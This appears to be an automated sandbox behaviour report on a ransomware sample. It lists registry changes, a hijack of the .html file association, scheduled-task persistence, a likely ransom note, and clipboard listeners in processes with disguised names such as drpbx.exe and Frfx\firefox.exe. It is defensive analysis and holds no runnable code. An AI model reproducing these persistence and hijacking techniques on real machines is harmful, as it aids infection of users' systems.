Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{D6D9E004-CD87-442B-9D57-5E0AEB4F6F72}\GroupByDirection = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\5 C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Loki\shell\open C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\lsr1041.lxa" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Speech SW Voice Activation - Japanese (Japan)" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.html C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "16000" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1216" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "MS-1033-110-WINMO-DNN" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "spell=NativeSupported; cardinal=GlobalSupported; ordinal=NativeSupported; date=GlobalSupported; time=GlobalSupported; telephone=NativeSupported; currency=NativeSupported; url=NativeSupported; address=NativeSupported; alphanumeric=NativeSupported; message=NativeSupported; computer=NativeSupported" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Speech Recognition Engine - es-ES Embedded DNN v11.1" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "CC" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "11.0" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.html\ = "NotSoCleverBotFile" C:\Windows\SysWOW64\cmd.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "{37A9D401-0BF5-4366-9530-C75C6DC23EC9}" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Hedda" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\MSTTSLocenUS.dat" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "German Phone Converter" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\tn1040.bin" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft David - English (United States)" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294967295" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "5223743" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\AI043082" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\c1040.fe" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 0400000003000000020000000100000000000000ffffffff C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\CortanaVoices\\Tokens\\MSTTS_V110_enUS_EvaM" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Cosimo" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\SniffedFolderType = "Documents" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\7\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHost_ = 6801000088020000 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 ~ 0009 aa 000a a 000b oh 000c ax 000d b 000e d 000f eh 0010 ey 0011 f 0012 g 0013 hy 0014 uy 0015 iy 0016 k 0017 l 0018 m 0019 n 001a ng 001b nj 001c oe 001d eu 001e ow 001f p 0020 r 0021 s 0022 sh 0023 t 0024 uw 0025 v 0026 w 0027 y 0028 z 0029 zh 002a" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\System32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\System32\Notepad.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\sdiagnhost.exe N/A
N/A N/A C:\Windows\System32\sdiagnhost.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
